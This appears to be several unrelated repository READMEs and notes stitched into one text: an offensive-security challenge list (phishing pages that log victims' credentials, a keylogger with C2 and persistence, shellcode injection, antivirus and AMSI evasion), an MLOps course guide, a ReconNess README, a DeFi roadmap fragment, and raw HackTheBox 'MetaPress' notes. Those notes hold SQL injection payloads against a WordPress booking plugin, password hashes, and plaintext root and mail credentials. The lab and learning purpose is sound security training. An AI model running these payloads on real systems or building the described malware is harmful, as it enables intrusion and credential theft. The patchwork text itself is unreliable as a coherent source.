When code is generated from this project, it shall be considered **AS IS** and owned by the user of the software. There are no warranties--expressed or implied--for generated code. You can do what you wish with it, and once generated, the code is your responsibility and subject to the licensing terms that you deem appropriate.
License
-------
Copyright 2018 SmartBear Software
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at [apache.org/licenses/LICENSE-2.0](http://www.apache.org/licenses/LICENSE-2.0)
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
---
<img src="http://swagger.io/wp-content/uploads/2016/02/logo.jpg"/>
|
# Advent of Code 2021
These are my Advent-Of-Code style challenges for red teaming / pentesting / IT-Security.
The challenges are separated into different modules:
* Setup
* Reconaissance
* Phishing
* Exploitation
* Basic Windows Malware Development
* Antivirus Evasion
**DISCLAIMER**: Prior experience in programming and, for the later modules (especially AV evasion), pentesting and security is required. These are not beginner-challenges! So do not be discouraged if a challenge is too hard for you. Just follow along a tutorial or just read something about the topic instead. The point is to get your feet wet and let you dive into the topic, not to do these challenges without help.
I decided to take the opportunity to learn more about [Nim](https://github.com/nim-lang/Nim) this year by writing all challenges in nim.
### Day 1: Lab Setup
Since you will have to test your scripts on a Windows Host (and since you don't want to infect your own host with your malware), you should setup a VM environment as a lab.
Day | Challenge | Description
---|---|---
1 | Setup a Lab | Create a Lab consisting of a Windows Pro host (use a evaluation iso) and a Kali machine.
### Day 2-6: Reconnaissance
In any pentest or engagement, reconnaissance is the first thing to do. Here we take some easy challenges to warm up. I recommend using either a scripting language such as Python or Ruby, or a high-performance language such as Go or Rust for these challenges, but any language is possible.
Day | Challenge | Description
---|---|---
[2](./02_Portscanner) | Port Scanner | Write a basic TCP port scanner. Bonus: Multithreading
[3](./03_BannerGrab) | Banner grabbing | Add the functionality to grab the banner of every open port
[4](./04_OSDetection) | OS Detection | Add the functionality to detect the OS (Linux/Windows/other)
[5](./05_ZombieScan) | Zombie Scanning | Add [Zombie Scanning/Idle Scanning](https://nmap.org/book/idlescan.html)
[6](./06_WebDiscover) | Directory Bruteforcer | Write a tool to discover valid pages on a webserver (think dirb, ffuf)
### Day 7-8: Initial Access: Phishing
Since phishing is one of the easiest ways to get into a system, we need to give it some attention here. A scripting language with a templating system is probably the easiest choice here, my choice would be python. But as above, any language is possible.
Day | Challenge | Description
---|---|---
[7](./07_PhishingServer) | Phishing Server | Write a script that clones a website (e.g. citrix login page) and hosts it. Record any Form submits to log credentials entered by victims.
[8](./08_PhishingSender) | Mail generator | Write a script that parses an Email-template and a list of victim data and fills in Names, Job Roles and the phishing URL and sends out a mail to the victims email address.
### Day 9-10: Exploitation
The following challenges are not coding challenges, but rather practical exeercises that aim at getting you into exploitation of vulnerabilities.
Day | Challenge | Description
---|---|---
9 | Buffer Overflow Exploitation | Do a buffer overflow on a Boot-To-Root box (e.g. Vulnserver). Follow a tutorial if you have not done this before
10 | HackTheBox | Try any box on [HackTheBox](https://www.hackthebox.eu)
### Day 11-14: Basic Windows Malware-Development/Post-Exploitation
This intro to malware development should mostly be done in a language that has access to the Windows APIs such as C, C++, C#, Powershell or Nim. The C2 can be written in any language.
Day | Challenge | Description
---|---|---
[11](./11_Keylogger) | Keylogger | Write a Keylogger that records keystrokes
[12](./12_Screenshot) | Screengrabber | Add the functionality that a screenshot is taken every X seconds. Optionally add Webcam shots too.
[13](./13_Autostart) | Persistence | Add persistence (e.g. via adding to autostart)
[14](./14_C2) | C2 Functionality | Create a basic Command and Control Server (C2) that serves commands to the keylogger. The keylogger asks each X seconds for what to do (e.g. take a screenshot, send recorded key inputs) on a set url (e.g. http://192.168.2.10/task).
### Day 15-22: Antivirus Evasion
You can check your keylogger from the previous module against virustotal, it likely won't be caught by many antivirus solutions. Getting C2 implants such as a meterpreter payload generated by msfvenom past AV is much harder though. Here we are gonna learn about techniques to obfuscate shellcode, inject it into processes and evade antivirus sandboxing. I highly recommend using C#, C++, C or Nim here. The encoders and AMSI bypass obfuscator can be written in any language.
As stated above, this is not beginner content. Feel free to slow down the pace or just read about these topics instead if you feel overwhelmed. Don't worry if you do not understand this stufd (yet :) ).
Day | Challenge | Description
---|---|---
[15](./15_Caesar) | Caesar Cipher | Write a tool that applies a Caesar Cipher to a binary payload
[16](./16_Xor) | XOR Encoder | Write a tool that takes a key and applies an XOR cipher to a binary payload
[17](./17_Hollow) | Process Hollowing | Write a tool that takes a binary payload and spawns another process in which the payload is injected and executed
[18](./18_DllInject) | DLL Injection | Write a tool that causes another process to load a DLL and execute its code
[19](./19_ProcGhost) | Another injection technique | Lookup another technique and use it to inject shellcode
[20](./20_Evasion) | Sandbox Detection | Add Antivirus-Evasion techniques to your injectors from Day 17/18, e.g. check if you are in sandbox by checking the amount of CPU cores or check if a sleep statement is actually execute or skipped by the AV's sandbox. Lookup "AV evasion sandbox detection".
21 | Meterpreter Injector | Use the above to get a meterpreter payload past Windows Defender. Check for sandboxing, then decrypt your (XOR or Caesar) encrypted shellcode and inject it into a process.
[22](./22_AmsiBypass) | AMSI Bypass Obfuscation Tool | Write a tool that takes Matt Graeber's One Line AMSI Bypass and obfuscates it randomly
### Day 23: Bonus Challenge
Day | Challenge | Description
---|---|---
[23](./23_NimNightmare) | Windows CVE PoC | Write a PoC for a Windows CVE (e.g. HiveNightmare/Serious Sam or PrintNightmare)
### Day 24: Celebrate
Day | Challenge | Description
---|---|---
24 | Congratulate yourself | Congratulate yourself :)
|
# MLOps Course
Learn how to combine machine learning with software engineering to design, develop, deploy and iterate on production-grade ML applications.
- Lessons: https://madewithml.com/
- Code: [GokuMohandas/Made-With-ML](https://github.com/GokuMohandas/Made-With-ML)
<a href="https://madewithml.com/#course">
<img src="https://madewithml.com/static/images/lessons.png" alt="lessons">
</a>
## Overview
In this course, we'll go from experimentation (model design + development) to production (model deployment + iteration). We'll do this iteratively by motivating the components that will enable us to build a *reliable* production system.
<blockquote>
<img width=20 src="https://upload.wikimedia.org/wikipedia/commons/thumb/0/09/YouTube_full-color_icon_%282017%29.svg/640px-YouTube_full-color_icon_%282017%29.svg.png"> Be sure to watch the video below for a quick overview of what we'll be building.
</blockquote>
<div align="center">
<a href="https://youtu.be/AWgkt8H8yVo"><img src="https://img.youtube.com/vi/AWgkt8H8yVo/0.jpg" alt="Course overview video"></a>
</div>
<br>
- **💡 First principles**: before we jump straight into the code, we develop a first principles understanding for every machine learning concept.
- **💻 Best practices**: implement software engineering best practices as we develop and deploy our machine learning models.
- **📈 Scale**: easily scale ML workloads (data, train, tune, serve) in Python without having to learn completely new languages.
- **⚙️ MLOps**: connect MLOps components (tracking, testing, serving, orchestration, etc.) as we build an end-to-end machine learning system.
- **🚀 Dev to Prod**: learn how to quickly and reliably go from development to production without any changes to our code or infra management.
- **🐙 CI/CD**: learn how to create mature CI/CD workflows to continuously train and deploy better models in a modular way that integrates with any stack.
## Audience
Machine learning is not a separate industry, instead, it's a powerful way of thinking about data that's not reserved for any one type of person.
- **👩💻 All developers**: whether software/infra engineer or data scientist, ML is increasingly becoming a key part of the products that you'll be developing.
- **👩🎓 College graduates**: learn the practical skills required for industry and bridge gap between the university curriculum and what industry expects.
- **👩💼 Product/Leadership**: who want to develop a technical foundation so that they can build amazing (and reliable) products powered by machine learning.
## Set up
Be sure to go through the [course](https://madewithml/#course) for a much more detailed walkthrough of the content on this repository. We will have instructions for both local laptop and Anyscale clusters for the sections below, so be sure to toggle the ► dropdown based on what you're using (Anyscale instructions will be toggled on by default). If you do want to run this course with Anyscale, where we'll provide the **structure**, **compute (GPUs)** and **community** to learn everything in one weekend, join our next upcoming live cohort → [sign up here](https://4190urw86oh.typeform.com/madewithml)!
### Cluster
We'll start by setting up our cluster with the environment and compute configurations.
<details>
<summary>Local</summary><br>
Your personal laptop (single machine) will act as the cluster, where one CPU will be the head node and some of the remaining CPU will be the worker nodes. All of the code in this course will work in any personal laptop though it will be slower than executing the same workloads on a larger cluster.
</details>
<details open>
<summary>Anyscale</summary><br>
We can create an [Anyscale Workspace](https://docs.anyscale.com/develop/workspaces/get-started) using the [webpage UI](https://console.anyscale.com/o/madewithml/workspaces/add/blank).
```md
- Workspace name: `madewithml`
- Project: `madewithml`
- Cluster environment name: `madewithml-cluster-env`
# Toggle `Select from saved configurations`
- Compute config: `madewithml-cluster-compute`
```
> Alternatively, we can use the [CLI](https://docs.anyscale.com/reference/anyscale-cli) to create the workspace via `anyscale workspace create ...`
</details>
<details>
<summary>Other (cloud platforms, K8s, on-prem)</summary><br>
If you don't want to do this course locally or via Anyscale, you have the following options:
- On [AWS and GCP](https://docs.ray.io/en/latest/cluster/vms/index.html#cloud-vm-index). Community-supported Azure and Aliyun integrations also exist.
- On [Kubernetes](https://docs.ray.io/en/latest/cluster/kubernetes/index.html#kuberay-index), via the officially supported KubeRay project.
- Deploy Ray manually [on-prem](https://docs.ray.io/en/latest/cluster/vms/user-guides/launching-clusters/on-premises.html#on-prem) or onto platforms [not listed here](https://docs.ray.io/en/latest/cluster/vms/user-guides/community/index.html#ref-cluster-setup).
</details>
### Git setup
Create a repository by following these instructions: [Create a new repository](https://github.com/new) → name it `Made-With-ML` → Toggle `Add a README file` (**very important** as this creates a `main` branch) → Click `Create repository` (scroll down)
Now we're ready to clone the repository that has all of our code:
```bash
git clone https://github.com/GokuMohandas/Made-With-ML.git .
git remote set-url origin https://github.com/GITHUB_USERNAME/Made-With-ML.git # <-- CHANGE THIS to your username
git checkout -b dev
```
### Virtual environment
<details>
<summary>Local</summary><br>
```bash
export PYTHONPATH=$PYTHONPATH:$PWD
python3 -m venv venv # recommend using Python 3.10
source venv/bin/activate # on Windows: venv\Scripts\activate
python3 -m pip install --upgrade pip setuptools wheel
python3 -m pip install -r requirements.txt
pre-commit install
pre-commit autoupdate
```
> Highly recommend using Python `3.10` and using [pyenv](https://github.com/pyenv/pyenv) (mac) or [pyenv-win](https://github.com/pyenv-win/pyenv-win) (windows).
</details>
<details open>
<summary>Anyscale</summary><br>
Our environment with the appropriate Python version and libraries is already all set for us through the cluster environment we used when setting up our Anyscale Workspace. So we just need to run these commands:
```bash
export PYTHONPATH=$PYTHONPATH:$PWD
pre-commit install
pre-commit autoupdate
```
</details>
## Notebook
Start by exploring the [jupyter notebook](notebooks/madewithml.ipynb) to interactively walkthrough the core machine learning workloads.
<div align="center">
<img src="https://madewithml.com/static/images/mlops/systems-design/workloads.png">
</div>
<details>
<summary>Local</summary><br>
```bash
# Start notebook
jupyter lab notebooks/madewithml.ipynb
```
</details>
<details open>
<summary>Anyscale</summary><br>
Click on the Jupyter icon <img width=15 src="https://upload.wikimedia.org/wikipedia/commons/thumb/3/38/Jupyter_logo.svg/1200px-Jupyter_logo.svg.png"> at the top right corner of our Anyscale Workspace page and this will open up our JupyterLab instance in a new tab. Then navigate to the `notebooks` directory and open up the `madewithml.ipynb` notebook.
</details>
## Scripts
Now we'll execute the same workloads using the clean Python scripts following software engineering best practices (testing, documentation, logging, serving, versioning, etc.) The code we've implemented in our notebook will be refactored into the following scripts:
```bash
madewithml
├── config.py
├── data.py
├── evaluate.py
├── models.py
├── predict.py
├── serve.py
├── train.py
├── tune.py
└── utils.py
```
**Note**: Change the `--num-workers`, `--cpu-per-worker`, and `--gpu-per-worker` input argument values below based on your system's resources. For example, if you're on a local laptop, a reasonable configuration would be `--num-workers 6 --cpu-per-worker 1 --gpu-per-worker 0`.
### Training
```bash
export EXPERIMENT_NAME="llm"
export DATASET_LOC="https://raw.githubusercontent.com/GokuMohandas/Made-With-ML/main/datasets/dataset.csv"
export TRAIN_LOOP_CONFIG='{"dropout_p": 0.5, "lr": 1e-4, "lr_factor": 0.8, "lr_patience": 3}'
python madewithml/train.py \
--experiment-name "$EXPERIMENT_NAME" \
--dataset-loc "$DATASET_LOC" \
--train-loop-config "$TRAIN_LOOP_CONFIG" \
--num-workers 1 \
--cpu-per-worker 3 \
--gpu-per-worker 1 \
--num-epochs 10 \
--batch-size 256 \
--results-fp results/training_results.json
```
### Tuning
```bash
export EXPERIMENT_NAME="llm"
export DATASET_LOC="https://raw.githubusercontent.com/GokuMohandas/Made-With-ML/main/datasets/dataset.csv"
export TRAIN_LOOP_CONFIG='{"dropout_p": 0.5, "lr": 1e-4, "lr_factor": 0.8, "lr_patience": 3}'
export INITIAL_PARAMS="[{\"train_loop_config\": $TRAIN_LOOP_CONFIG}]"
python madewithml/tune.py \
--experiment-name "$EXPERIMENT_NAME" \
--dataset-loc "$DATASET_LOC" \
--initial-params "$INITIAL_PARAMS" \
--num-runs 2 \
--num-workers 1 \
--cpu-per-worker 3 \
--gpu-per-worker 1 \
--num-epochs 10 \
--batch-size 256 \
--results-fp results/tuning_results.json
```
### Experiment tracking
We'll use [MLflow](https://mlflow.org/) to track our experiments and store our models and the [MLflow Tracking UI](https://www.mlflow.org/docs/latest/tracking.html#tracking-ui) to view our experiments. We have been saving our experiments to a local directory but note that in an actual production setting, we would have a central location to store all of our experiments. It's easy/inexpensive to spin up your own MLflow server for all of your team members to track their experiments on or use a managed solution like [Weights & Biases](https://wandb.ai/site), [Comet](https://www.comet.ml/), etc.
```bash
export MODEL_REGISTRY=$(python -c "from madewithml import config; print(config.MODEL_REGISTRY)")
mlflow server -h 0.0.0.0 -p 8080 --backend-store-uri $MODEL_REGISTRY
```
<details>
<summary>Local</summary><br>
If you're running this notebook on your local laptop then head on over to <a href="http://localhost:8080/" target="_blank">http://localhost:8080/</a> to view your MLflow dashboard.
</details>
<details open>
<summary>Anyscale</summary><br>
If you're on <a href="https://docs.anyscale.com/develop/workspaces/get-started" target="_blank">Anyscale Workspaces</a>, then we need to first expose the port of the MLflow server. Run the following command on your Anyscale Workspace terminal to generate the public URL to your MLflow server.
```bash
APP_PORT=8080
echo https://$APP_PORT-port-$ANYSCALE_SESSION_DOMAIN
```
</details>
### Evaluation
```bash
export EXPERIMENT_NAME="llm"
export RUN_ID=$(python madewithml/predict.py get-best-run-id --experiment-name $EXPERIMENT_NAME --metric val_loss --mode ASC)
export HOLDOUT_LOC="https://raw.githubusercontent.com/GokuMohandas/Made-With-ML/main/datasets/holdout.csv"
python madewithml/evaluate.py \
--run-id $RUN_ID \
--dataset-loc $HOLDOUT_LOC \
--results-fp results/evaluation_results.json
```
```json
{
"timestamp": "June 09, 2023 09:26:18 AM",
"run_id": "6149e3fec8d24f1492d4a4cabd5c06f6",
"overall": {
"precision": 0.9076136428670714,
"recall": 0.9057591623036649,
"f1": 0.9046792827719773,
"num_samples": 191.0
},
...
```
### Inference
```bash
# Get run ID
export EXPERIMENT_NAME="llm"
export RUN_ID=$(python madewithml/predict.py get-best-run-id --experiment-name $EXPERIMENT_NAME --metric val_loss --mode ASC)
python madewithml/predict.py predict \
--run-id $RUN_ID \
--title "Transfer learning with transformers" \
--description "Using transformers for transfer learning on text classification tasks."
```
```json
[{
"prediction": [
"natural-language-processing"
],
"probabilities": {
"computer-vision": 0.0009767753,
"mlops": 0.0008223939,
"natural-language-processing": 0.99762577,
"other": 0.000575123
}
}]
```
### Serving
<details>
<summary>Local</summary><br>
```bash
# Start
ray start --head
```
```bash
# Set up
export EXPERIMENT_NAME="llm"
export RUN_ID=$(python madewithml/predict.py get-best-run-id --experiment-name $EXPERIMENT_NAME --metric val_loss --mode ASC)
python madewithml/serve.py --run_id $RUN_ID
```
While the application is running, we can use it via cURL, Python, etc.:
```bash
# via cURL
curl -X POST -H "Content-Type: application/json" -d '{
"title": "Transfer learning with transformers",
"description": "Using transformers for transfer learning on text classification tasks."
}' http://127.0.0.1:8000/predict
```
```python
# via Python
import json
import requests
title = "Transfer learning with transformers"
description = "Using transformers for transfer learning on text classification tasks."
json_data = json.dumps({"title": title, "description": description})
requests.post("http://127.0.0.1:8000/predict", data=json_data).json()
```
```bash
ray stop # shutdown
```
```bash
export HOLDOUT_LOC="https://raw.githubusercontent.com/GokuMohandas/Made-With-ML/main/datasets/holdout.csv"
curl -X POST -H "Content-Type: application/json" -d '{
"dataset_loc": "https://raw.githubusercontent.com/GokuMohandas/Made-With-ML/main/datasets/holdout.csv"
}' http://127.0.0.1:8000/evaluate
```
</details>
<details open>
<summary>Anyscale</summary><br>
In Anyscale Workspaces, Ray is already running so we don't have to manually start/shutdown like we have to do locally.
```bash
# Set up
export EXPERIMENT_NAME="llm"
export RUN_ID=$(python madewithml/predict.py get-best-run-id --experiment-name $EXPERIMENT_NAME --metric val_loss --mode ASC)
python madewithml/serve.py --run_id $RUN_ID
```
While the application is running, we can use it via cURL, Python, etc.:
```bash
# via cURL
curl -X POST -H "Content-Type: application/json" -d '{
"title": "Transfer learning with transformers",
"description": "Using transformers for transfer learning on text classification tasks."
}' http://127.0.0.1:8000/predict
```
```python
# via Python
import json
import requests
title = "Transfer learning with transformers"
description = "Using transformers for transfer learning on text classification tasks."
json_data = json.dumps({"title": title, "description": description})
requests.post("http://127.0.0.1:8000/predict", data=json_data).json()
```
</details>
### Testing
```bash
# Code
python3 -m pytest tests/code --verbose --disable-warnings
# Data
export DATASET_LOC="https://raw.githubusercontent.com/GokuMohandas/Made-With-ML/main/datasets/dataset.csv"
pytest --dataset-loc=$DATASET_LOC tests/data --verbose --disable-warnings
# Model
export EXPERIMENT_NAME="llm"
export RUN_ID=$(python madewithml/predict.py get-best-run-id --experiment-name $EXPERIMENT_NAME --metric val_loss --mode ASC)
pytest --run-id=$RUN_ID tests/model --verbose --disable-warnings
# Coverage
python3 -m pytest --cov madewithml --cov-report html
```
## Production
From this point onwards, in order to deploy our application into production, we'll need to either be on Anyscale or on a [cloud VM](https://docs.ray.io/en/latest/cluster/vms/index.html#cloud-vm-index) / [on-prem](https://docs.ray.io/en/latest/cluster/vms/user-guides/launching-clusters/on-premises.html#on-prem) cluster you manage yourself (w/ Ray). If not on Anyscale, the commands will be [slightly different](https://docs.ray.io/en/latest/cluster/running-applications/job-submission/index.html) but the concepts will be the same.
> If you don't want to set up all of this yourself, we highly recommend joining our [upcoming live cohort](https://4190urw86oh.typeform.com/madewithml){:target="_blank"} where we'll provide an environment with all of this infrastructure already set up for you so that you just focused on the machine learning.
<div align="center">
<img src="https://madewithml.com/static/images/mlops/jobs_and_services/manual.png">
</div>
### Authentication
These credentials below are **automatically** set for us if we're using Anyscale Workspaces. We **do not** need to set these credentials explicitly on Workspaces but we do if we're running this locally or on a cluster outside of where our Anyscale Jobs and Services are configured to run.
``` bash
export ANYSCALE_HOST=https://console.anyscale.com
export ANYSCALE_CLI_TOKEN=$YOUR_CLI_TOKEN # retrieved from Anyscale credentials page
```
### Cluster environment
The cluster environment determines **where** our workloads will be executed (OS, dependencies, etc.) We've already created this [cluster environment](./deploy/cluster_env.yaml) for us but this is how we can create/update one ourselves.
```bash
export CLUSTER_ENV_NAME="madewithml-cluster-env"
anyscale cluster-env build deploy/cluster_env.yaml --name $CLUSTER_ENV_NAME
```
### Compute configuration
The compute configuration determines **what** resources our workloads will be executes on. We've already created this [compute configuration](./deploy/cluster_compute.yaml) for us but this is how we can create it ourselves.
```bash
export CLUSTER_COMPUTE_NAME="madewithml-cluster-compute"
anyscale cluster-compute create deploy/cluster_compute.yaml --name $CLUSTER_COMPUTE_NAME
```
### Anyscale jobs
Now we're ready to execute our ML workloads. We've decided to combine them all together into one [job](./deploy/jobs/workloads.yaml) but we could have also created separate jobs for each workload (train, evaluate, etc.) We'll start by editing the `$GITHUB_USERNAME` slots inside our [`workloads.yaml`](./deploy/jobs/workloads.yaml) file:
```yaml
runtime_env:
working_dir: .
upload_path: s3://madewithml/$GITHUB_USERNAME/jobs # <--- CHANGE USERNAME (case-sensitive)
env_vars:
GITHUB_USERNAME: $GITHUB_USERNAME # <--- CHANGE USERNAME (case-sensitive)
```
The `runtime_env` here specifies that we should upload our current `working_dir` to an S3 bucket so that all of our workers when we execute an Anyscale Job have access to the code to use. The `GITHUB_USERNAME` is used later to save results from our workloads to S3 so that we can retrieve them later (ex. for serving).
Now we're ready to submit our job to execute our ML workloads:
```bash
anyscale job submit deploy/jobs/workloads.yaml
```
### Anyscale Services
And after our ML workloads have been executed, we're ready to launch our serve our model to production. Similar to our Anyscale Jobs configs, be sure to change the `$GITHUB_USERNAME` in [`serve_model.yaml`](./deploy/services/serve_model.yaml).
```yaml
ray_serve_config:
import_path: deploy.services.serve_model:entrypoint
runtime_env:
working_dir: .
upload_path: s3://madewithml/$GITHUB_USERNAME/services # <--- CHANGE USERNAME (case-sensitive)
env_vars:
GITHUB_USERNAME: $GITHUB_USERNAME # <--- CHANGE USERNAME (case-sensitive)
```
Now we're ready to launch our service:
```bash
# Rollout service
anyscale service rollout -f deploy/services/serve_model.yaml
# Query
curl -X POST -H "Content-Type: application/json" -H "Authorization: Bearer $SECRET_TOKEN" -d '{
"title": "Transfer learning with transformers",
"description": "Using transformers for transfer learning on text classification tasks."
}' $SERVICE_ENDPOINT/predict/
# Rollback (to previous version of the Service)
anyscale service rollback -f $SERVICE_CONFIG --name $SERVICE_NAME
# Terminate
anyscale service terminate --name $SERVICE_NAME
```
### CI/CD
We're not going to manually deploy our application every time we make a change. Instead, we'll automate this process using GitHub Actions!
<div align="center">
<img src="https://madewithml.com/static/images/mlops/cicd/cicd.png">
</div>
1. We'll start by adding the necessary credentials to the [`/settings/secrets/actions`](https://github.com/GokuMohandas/Made-With-ML/settings/secrets/actions) page of our GitHub repository.
``` bash
export ANYSCALE_HOST=https://console.anyscale.com
export ANYSCALE_CLI_TOKEN=$YOUR_CLI_TOKEN # retrieved from https://console.anyscale.com/o/madewithml/credentials
```
2. Now we can make changes to our code (not on `main` branch) and push them to GitHub. But in order to push our code to GitHub, we'll need to first authenticate with our credentials before pushing to our repository:
```bash
git config --global user.name "Your Name" # <-- CHANGE THIS to your name
git config --global user.email [email protected] # <-- CHANGE THIS to your email
git add .
git commit -m "" # <-- CHANGE THIS to your message
git push origin dev
```
Now you will be prompted to enter your username and password (personal access token). Follow these steps to get personal access token: [New GitHub personal access token](https://github.com/settings/tokens/new) → Add a name → Toggle `repo` and `workflow` → Click `Generate token` (scroll down) → Copy the token and paste it when prompted for your password.
3. Now we can start a PR from this branch to our `main` branch and this will trigger the [workloads workflow](/.github/workflows/workloads.yaml). If the workflow (Anyscale Jobs) succeeds, this will produce comments with the training and evaluation results directly on the PR.
<div align="center">
<img src="https://madewithml.com/static/images/mlops/cicd/comments.png">
</div>
4. If we like the results, we can merge the PR into the `main` branch. This will trigger the [serve workflow](/.github/workflows/serve.yaml) which will rollout our new service to production!
### Continual learning
With our CI/CD workflow in place to deploy our application, we can now focus on continually improving our model. It becomes really easy to extend on this foundation to connect to scheduled runs (cron), [data pipelines](https://madewithml.com/courses/mlops/data-engineering/), drift detected through [monitoring](https://madewithml.com/courses/mlops/monitoring/), [online evaluation](https://madewithml.com/courses/mlops/evaluation/#online-evaluation), etc. And we can easily add additional context such as comparing any experiment with what's currently in production (directly in the PR even), etc.
<div align="center">
<img src="https://madewithml.com/static/images/mlops/cicd/continual.png">
</div>
## FAQ
### Jupyter notebook kernels
Issues with configuring the notebooks with jupyter? By default, jupyter will use the kernel with our virtual environment but we can also manually add it to jupyter:
```bash
python3 -m ipykernel install --user --name=venv
```
Now we can open up a notebook → Kernel (top menu bar) → Change Kernel → `venv`. To ever delete this kernel, we can do the following:
```bash
jupyter kernelspec list
jupyter kernelspec uninstall venv
```
|
### robots.txt
```
User-agent: *
Disallow: /wp-admin/
Allow: /wp-admin/admin-ajax.php
Sitemap: http://metapress.htb/wp-sitemap.xml
```
git clone https://github.com/relarizky/wpxploit.git
cd wpxploit
pip3 install -r requirements.txt
./exploit.py
wpscan --rua -e ap,at,tt,cb,dbe,u,m --url http://metapress.htb/ --passwords /usr/share/wordlists/external/SecLists/Passwords/probable-v2-top1575.txt
curl -i 'http://metapress.htb/wp-admin/admin-ajax.php' \
--data 'action=bookingpress_front_get_category_services&_wpnonce=f26ed88649&category_id=33&total_service=-7502) UNION ALL SELECT @@version,@@version_comment,@@version_compile_os,1,2,3,4,5,gRoUp_cOncaT(0x7c,schema_name,0x7c) fRoM information_schema.schemata-- -'
curl -i 'http://metapress.htb/wp-admin/admin-ajax.php' \
--data 'action=bookingpress_front_get_category_services&_wpnonce=f26ed88649&category_id=1&total_service=1) AND (SELECT 9578 FROM (SELECT(SLEEP(5)))iyUp)-- ZmjHa
gRoUp_cOncaT(0x7c,table_name,0x7C)+fRoM+information_schema.tables+wHeRe+table_schema=
curl -i 'http://metapress.htb/wp-admin/admin-ajax.php' \
--data 'action=bookingpress_front_get_category_services&_wpnonce=f26ed88649&category_id=33&total_service=1'
$P$B4aNM28N0E.tMy/JIcnVMZbGcU16Q70
$P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV.
$mail->Username = "[email protected]";
$mail->Password = "Cb4_JmWM8zUZWMu@Ys";
credentials:
- comment: ''
fullname: root@ssh
login: root
modified: 2022-06-26 08:58:15.621572
name: ssh
password: !!python/unicode 'p7qfAZt4_A1xo_0x'
- comment: ''
fullname: jnelson@ssh
login: jnelson
modified: 2022-06-26 08:58:15.514422
name: ssh
password: !!python/unicode 'Cb4_JmWM8zUZWMu@Ys'
handler: passpie
version: 1.0
ter
|
# ReconNess Web App
[![Build Status](https://dev.azure.com/reconness/reconness/_apis/build/status/reconness.reconness?branchName=master)](https://dev.azure.com/reconness/reconness/_build/latest?definitionId=1&branchName=master)
<a href="https://twitter.com/reconness"><img src="https://img.shields.io/twitter/follow/reconness?logo=twitter&??style=flat-square&logo=appveyor"></a>
<p align="center">
<img width="300" height="300" src="logo.png">
</p>
## Why ReconNess?
Well, we have seen a lot of #bugbounty hackers organizing his #recon using txt and doing a lot of bash scripts to filter the output to keep everything organized with the intention to focus only on the potentially vulnerable targets. But realistically this demands a lot of bash skill and strong folders/files organization process to avoid the feeling of chaos.
ReconNess helps you to run and keep all your #recon in the same place allowing you to focus only on the potentially vulnerable targets without distraction and without required a lot of bash skill or programing skill in general.
With ReconNess you can put all your learning effort only on how to exploit the targets using one specific kind of vulnerability for example and at the same time you are sure that your #recon is good and organized.
## Continuous Recon (CR)
ReconNess is a platform to allow continuous recon (CR) where you can set up a pipeline of #recon tools (Agents) and trigger it base on schedule or events.
## Quick Start
Check this [link](https://docs.reconness.com/getting-started/quick-start) to know how put ReconNess running and start collecting #recon data from yours targets.
## Development
NodeJs Current and LTS Releases
[https://nodejs.org/download/release/](https://nodejs.org/download/release/)
DotNet 6
[https://dotnet.microsoft.com/download/dotnet/6.0](https://dotnet.microsoft.com/download/dotnet/6.0)
We are working in the **NEW UI**, you can check here the progress
[http://134.209.46.128/](http://134.209.46.128/)
## Work in Progress (!!!!!NEW UI!!!!)
### Home
![image](https://user-images.githubusercontent.com/1503645/111404842-d9660600-86a5-11eb-9651-2ac0881c2616.png)
### Targets
![image](https://user-images.githubusercontent.com/1503645/111404929-ff8ba600-86a5-11eb-9965-d3c80080feac.png)
![image](https://user-images.githubusercontent.com/1503645/111404978-1205df80-86a6-11eb-8db1-5a98f81a0532.png)
![image](https://user-images.githubusercontent.com/1503645/111405002-1df1a180-86a6-11eb-8e09-22c370d43ed4.png)
### Agents
![image](https://user-images.githubusercontent.com/1503645/111405052-31047180-86a6-11eb-8c00-09e2c343aedc.png)
![image](https://user-images.githubusercontent.com/1503645/111405107-47aac880-86a6-11eb-9513-4d2c01453735.png)
## Join us
If you want to know what is next or you want to help us, please join us.
[Discord](https://discord.com/invite/hpKVRFM)
[Twitter](https://twitter.com/reconness)
## Licensing
MIT License
|
# DeFi Developer Road Map
**Here we collect and discuss the best DeFi & Blockchain researches and tools - contributions are welcome.**
**Feel free to submit a pull request, with anything from small fixes to translations, docs or tools you'd like to add.**
- **Disclaimer: All information (tools, links, articles, text, images, etc.) is provided for educational purposes only! All information is also based on data from public sources. You are solely responsible for your actions, not the author** ❗️
[![Support Project](https://img.shields.io/badge/Support-Project-critical)](https://github.com/OffcierCia/support/blob/main/README.md) [![Supported by GitCoin](https://img.shields.io/badge/Support%20via-GitCoin-yellowgreen)](https://gitcoin.co/grants/3150/defi-developer-roadmap) [![Supported by LEGO](https://img.shields.io/badge/Supported%20by-LEGO-%2300A3FF)](https://www.notion.so/LEGO-Lido-Ecosystem-Grants-Organisation-d7f0bf0182d44348b6173639d2e8363d)
[![Research Base](https://img.shields.io/badge/Research-Base-lightgrey)](https://github.com/OffcierCia/ultimate-defi-research-base)
[![Mail](https://img.shields.io/badge/Mail-offcierciapr%40protonmail.com-brightgreen)](mailto:[email protected])
## **Translations:**
- [French](https://github.com/OffcierCia/DeFi-Developer-Road-Map/blob/main/translations/README_fr.md)
- [Korean](https://github.com/OffcierCia/DeFi-Developer-Road-Map/blob/main/translations/README_ko.md)
- [Japanese](https://www.wenyanet.com/opensource/ja/6304f1549168d4612c5c5064.html)
- [Italiano](https://github.com/OffcierCia/DeFi-Developer-Road-Map/blob/main/translations/README_it.md)
- [Telugu](https://github.com/OffcierCia/DeFi-Developer-Road-Map/blob/main/translations/README_tel.md)
- [Gujarati](https://github.com/OffcierCia/DeFi-Developer-Road-Map/blob/main/translations/README_guj.md)
- [Spanish](https://github.com/OffcierCia/DeFi-Developer-Road-Map/blob/main/translations/README_es.md)
- [Chinese](https://github.com/OffcierCia/DeFi-Developer-Road-Map/blob/main/translations/README_cn.md)
</details>
## Roadmap
![Roadmap](./DeFiRoadMapNewSVG.svg)
# Navigation
**[Alternative navigation](https://cia.start.me/p/dlaxD0/ciaofficerv2)** ❗️
#
<details>
<summary>Translations</summary>
<br />
- [French](https://github.com/OffcierCia/DeFi-Developer-Road-Map/blob/main/translations/README_fr.md)
